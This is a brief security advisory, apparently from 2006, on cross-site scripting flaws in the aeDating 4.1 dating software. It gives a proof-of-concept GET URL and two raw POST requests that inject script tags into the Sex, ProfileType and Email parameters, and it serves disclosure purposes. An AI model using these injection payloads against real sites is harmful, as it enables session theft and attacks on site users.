Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13303
HistoryJun 25, 2006 - 12:00 a.m.

aeDating 4.1 XSS

2006-06-2500:00:00
vulners.com
12

Product of AEwebworks Dating Software
http://www.aewebworks.com/

Cross Site Scripting (XSS)

http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test/)</script>&Mode=last
^"G4" Template work^

POST /join_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 1685
page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&WhereChildren=

POST /forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 65
Email="><script>alert(/Elipsis+Security+Test/)</script>

Ellipsis Security
http://www.ellsec.org